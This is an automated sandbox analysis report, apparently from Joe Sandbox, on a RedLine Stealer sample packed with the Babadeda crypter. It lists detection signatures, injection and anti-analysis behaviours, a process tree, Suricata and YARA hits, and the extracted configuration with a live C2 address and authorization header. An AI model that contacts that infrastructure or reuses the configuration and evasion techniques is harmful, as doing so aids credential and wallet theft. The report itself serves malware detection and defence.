Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
K6qneGSDSB.exe

Overview

General Information

Sample name:K6qneGSDSB.exe
renamed because original name is a hash value
Original sample name:52c82f6ceb8cf41de8a4c01b313e3712.exe
Analysis ID:1575318
MD5:52c82f6ceb8cf41de8a4c01b313e3712
SHA1:69b699431dbbee3b6fd76d762a27db30f1f792b5
SHA256:0a9bec73980eb6774e0e50da9dd812551d20a7d839020976ebdc0fb93ed2ebf9
Tags:exeuser-abuse_ch
Infos:

Detection

Babadeda, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Benign windows process drops PE files
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Babadeda
Yara detected RedLine Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Found API chain indicative of debugger detection
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking mutex)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • K6qneGSDSB.exe (PID: 6480 cmdline: "C:\Users\user\Desktop\K6qneGSDSB.exe" MD5: 52C82F6CEB8CF41DE8A4C01B313E3712)
    • systemsx.exe (PID: 5752 cmdline: "C:\Users\user\AppData\Roaming\systemsx.exe" MD5: 1BBC3BFF13812C25D47CD84BCA3DA2DC)
      • msiexec.exe (PID: 6348 cmdline: "C:\Windows\system32\msiexec.exe" MD5: E5DA170027542E25EDE42FC54C929077)
      • audiodg.exe (PID: 3092 cmdline: "C:\Windows\system32\audiodg.exe" MD5: 627DEA21175691FDE4495877C53B4C87)
      • svchost.exe (PID: 5016 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
          • DB9C.tmp.ssg.exe (PID: 1292 cmdline: "C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exe" MD5: 7B6730CA4DA283A35C41B831B9567F15)
          • 616766F8886C145454191.exe (PID: 7088 cmdline: "C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exe" MD5: 1BBC3BFF13812C25D47CD84BCA3DA2DC)
            • svchost.exe (PID: 5484 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • audiodg.exe (PID: 6480 cmdline: "C:\Windows\system32\audiodg.exe" MD5: 627DEA21175691FDE4495877C53B4C87)
            • msiexec.exe (PID: 4744 cmdline: "C:\Windows\system32\msiexec.exe" MD5: E5DA170027542E25EDE42FC54C929077)
          • 616766F8886C145454191.exe (PID: 5632 cmdline: "C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exe" MD5: 1BBC3BFF13812C25D47CD84BCA3DA2DC)
            • svchost.exe (PID: 4084 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • audiodg.exe (PID: 5260 cmdline: "C:\Windows\system32\audiodg.exe" MD5: 627DEA21175691FDE4495877C53B4C87)
            • msiexec.exe (PID: 1084 cmdline: "C:\Windows\system32\msiexec.exe" MD5: E5DA170027542E25EDE42FC54C929077)
          • 58B.tmp.zx.exe (PID: 5476 cmdline: "C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe" MD5: B40682DDC13C95E3C0228D09A3B6AAE2)
            • 58B.tmp.zx.exe (PID: 4508 cmdline: "C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe" MD5: B40682DDC13C95E3C0228D09A3B6AAE2)
    • Grabber.exe (PID: 5768 cmdline: "Grabber.exe" MD5: 7BCE43CC96CC747B5909B5FA404C7FFE)
      • cmd.exe (PID: 7140 cmdline: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\B334.tmp\B335.tmp\B336.bat C:\Users\user\Desktop\Grabber.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
BabadedaAccording to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["185.81.68.147:1912"], "Bot Id": "eewx", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        C:\Users\user\Desktop\Grabber.exeJoeSecurity_BabadedaYara detected BabadedaJoe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          0000000A.00000000.2151588045.0000000000E52000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
            • 0x3dddd:$s2: ReflectiveLoader@
            00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
            • 0x3c9dd:$s2: ReflectiveLoader@
            00000007.00000000.2060880149.0000000008B70000.00000040.00000001.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
            • 0x3c9dd:$s2: ReflectiveLoader@
            00000006.00000002.3291804673.00000251E2E7D000.00000004.00000020.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
            • 0x3c9dd:$s2: ReflectiveLoader@
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.0.Grabber.exe.400000.0.unpackJoeSecurity_BabadedaYara detected BabadedaJoe Security
              0.2.K6qneGSDSB.exe.7ff79cdc4c80.2.raw.unpackJoeSecurity_BabadedaYara detected BabadedaJoe Security
                7.3.explorer.exe.ca53600.6.raw.unpackINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
                • 0x3c9dd:$s2: ReflectiveLoader@
                0.0.K6qneGSDSB.exe.7ff79cdc4c80.2.raw.unpackJoeSecurity_BabadedaYara detected BabadedaJoe Security
                  7.2.explorer.exe.e8b0000.3.raw.unpackINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
                  • 0x3dddd:$s2: ReflectiveLoader@
                  Click to see the 20 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: CurrentVersion Autorun Keys Modification
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\systemsx.exe, ProcessId: 5752, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services
                  Sigma detected: Uncommon Svchost Parent Process
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\svchost.exe", CommandLine: "C:\Windows\system32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\systemsx.exe", ParentImage: C:\Users\user\AppData\Roaming\systemsx.exe, ParentProcessId: 5752, ParentProcessName: systemsx.exe, ProcessCommandLine: "C:\Windows\system32\svchost.exe", ProcessId: 5016, ProcessName: svchost.exe
                  Sigma detected: Windows Processes Suspicious Parent Directory
                  Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\system32\svchost.exe", CommandLine: "C:\Windows\system32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\systemsx.exe", ParentImage: C:\Users\user\AppData\Roaming\systemsx.exe, ParentProcessId: 5752, ParentProcessName: systemsx.exe, ProcessCommandLine: "C:\Windows\system32\svchost.exe", ProcessId: 5016, ProcessName: svchost.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-15T09:12:11.747831+010020432341A Network Trojan was detected185.81.68.1471912192.168.2.549709TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-15T09:12:11.312305+010020432311A Network Trojan was detected192.168.2.549709185.81.68.1471912TCP
                  2024-12-15T09:12:16.838110+010020432311A Network Trojan was detected192.168.2.549709185.81.68.1471912TCP
                  2024-12-15T09:12:17.585683+010020432311A Network Trojan was detected192.168.2.549709185.81.68.1471912TCP
                  2024-12-15T09:12:18.059346+010020432311A Network Trojan was detected192.168.2.549709185.81.68.1471912TCP
                  2024-12-15T09:12:18.560307+010020432311A Network Trojan was detected192.168.2.549709185.81.68.1471912TCP
                  2024-12-15T09:12:18.864446+010020432311A Network Trojan was detected192.168.2.549709185.81.68.1471912TCP
                  2024-12-15T09:12:19.934900+010020432311A Network Trojan was detected192.168.2.549709185.81.68.1471912TCP
                  2024-12-15T09:12:20.239393+010020432311A Network Trojan was detected192.168.2.549709185.81.68.1471912TCP
                  2024-12-15T09:12:20.551913+010020432311A Network Trojan was detected192.168.2.549709185.81.68.1471912TCP
                  2024-12-15T09:12:21.044107+010020432311A Network Trojan was detected192.168.2.549709185.81.68.1471912TCP
                  2024-12-15T09:12:22.123287+010020432311A Network Trojan was detected192.168.2.549709185.81.68.1471912TCP
                  2024-12-15T09:12:22.563933+010020432311A Network Trojan was detected192.168.2.549709185.81.68.1471912TCP
                  2024-12-15T09:12:23.696023+010020432311A Network Trojan was detected192.168.2.549709185.81.68.1471912TCP
                  2024-12-15T09:12:24.134576+010020432311A Network Trojan was detected192.168.2.549709185.81.68.1471912TCP
                  2024-12-15T09:12:24.574403+010020432311A Network Trojan was detected192.168.2.549709185.81.68.1471912TCP
                  2024-12-15T09:12:25.139811+010020432311A Network Trojan was detected192.168.2.549709185.81.68.1471912TCP
                  2024-12-15T09:12:25.618679+010020432311A Network Trojan was detected192.168.2.549709185.81.68.1471912TCP
                  2024-12-15T09:12:26.056348+010020432311A Network Trojan was detected192.168.2.549709185.81.68.1471912TCP
                  2024-12-15T09:12:26.495368+010020432311A Network Trojan was detected192.168.2.549709185.81.68.1471912TCP
                  2024-12-15T09:12:26.932334+010020432311A Network Trojan was detected192.168.2.549709185.81.68.1471912TCP
                  2024-12-15T09:12:27.682095+010020432311A Network Trojan was detected192.168.2.549709185.81.68.1471912TCP
                  2024-12-15T09:12:27.802215+010020432311A Network Trojan was detected192.168.2.549709185.81.68.1471912TCP
                  2024-12-15T09:12:32.460143+010020432311A Network Trojan was detected192.168.2.549709185.81.68.1471912TCP
                  2024-12-15T09:12:33.130578+010020432311A Network Trojan was detected192.168.2.549709185.81.68.1471912TCP
                  2024-12-15T09:12:33.566408+010020432311A Network Trojan was detected192.168.2.549709185.81.68.1471912TCP
                  2024-12-15T09:12:34.002387+010020432311A Network Trojan was detected192.168.2.549709185.81.68.1471912TCP
                  2024-12-15T09:12:34.479473+010020432311A Network Trojan was detected192.168.2.549709185.81.68.1471912TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-15T09:12:17.275073+010020460561A Network Trojan was detected185.81.68.1471912192.168.2.549709TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-15T09:12:07.859403+010020197142Potentially Bad Traffic192.168.2.549707185.81.68.14780TCP
                  2024-12-15T09:12:10.502400+010020197142Potentially Bad Traffic192.168.2.549708185.81.68.14780TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-15T09:12:11.312305+010020460451A Network Trojan was detected192.168.2.549709185.81.68.1471912TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: K6qneGSDSB.exeAvira: detected
                  Antivirus detection for URL or domain
                  Source: http://185.81.68.147/VzCAHn.php?616766F8886C145454191Avira URL Cloud: Label: phishing
                  Found malware configuration
                  Source: 10.0.DB9C.tmp.ssg.exe.e50000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": ["185.81.68.147:1912"], "Bot Id": "eewx", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeReversingLabs: Detection: 34%
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeReversingLabs: Detection: 91%
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeReversingLabs: Detection: 75%
                  Source: C:\Users\user\Desktop\Grabber.exeReversingLabs: Detection: 46%
                  Multi AV Scanner detection for submitted file
                  Source: K6qneGSDSB.exeReversingLabs: Detection: 60%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\12DB.tmp.update.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: K6qneGSDSB.exeJoe Sandbox ML: detected

                  Compliance

                  barindex
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\Desktop\Grabber.exeUnpacked PE file: 2.2.Grabber.exe.400000.0.unpack
                  Source: K6qneGSDSB.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2267386749.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2267770032.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: 58B.tmp.zx.exe, 00000014.00000003.2262938360.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2263939573.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2263140535.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ucrtbase.pdb source: 58B.tmp.zx.exe, 00000015.00000002.2282049596.00007FF8B83B5000.00000002.00000001.01000000.0000000D.sdmp
                  Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2264892382.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2263562341.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2262788389.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2266275697.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2267088292.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2267899840.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\A\21\b\bin\amd64\_ctypes.pdb source: 58B.tmp.zx.exe, 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmp
                  Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2264369646.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2266614466.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2262397211.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2266036420.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2266980903.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2263690162.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: vcruntime140.amd64.pdbGCTL source: 58B.tmp.zx.exe, 00000014.00000003.2262199311.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000002.2283315372.00007FF8BFB9E000.00000002.00000001.01000000.0000000F.sdmp
                  Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2265374103.000001E7FAE62000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.20.dr
                  Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2263301528.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2263813884.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2266860294.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\A\21\b\bin\amd64\select.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2271470360.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2265641885.000001E7FAE62000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ucrtbase.pdbUGP source: 58B.tmp.zx.exe, 00000015.00000002.2282049596.00007FF8B83B5000.00000002.00000001.01000000.0000000D.sdmp
                  Source: Binary string: vcruntime140.amd64.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2262199311.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000002.2283315372.00007FF8BFB9E000.00000002.00000001.01000000.0000000F.sdmp
                  Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2268170661.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2264238759.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2266157990.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2265122857.000001E7FAE62000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2263440784.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1d 10 Sep 2019built on: Mon Sep 16 11:00:37 2019 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: libcrypto-1_1.dll.20.dr
                  Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2266733629.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\A\21\b\bin\amd64\python38.pdb source: 58B.tmp.zx.exe, 00000015.00000002.2281210120.00007FF8A861D000.00000002.00000001.01000000.0000000E.sdmp
                  Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2264779534.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2262938360.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2267510293.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2265517016.000001E7FAE62000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2265004152.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2268309680.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2265777590.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2266400666.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\A\6\b\libcrypto-1_1.pdb source: libcrypto-1_1.dll.20.dr
                  Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2265914384.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2264091431.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2267634610.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2264639725.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2264509778.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: libcrypto-1_1.dll.20.dr
                  Source: Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2272495227.000001E7FAE6C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2267252946.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2268031791.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
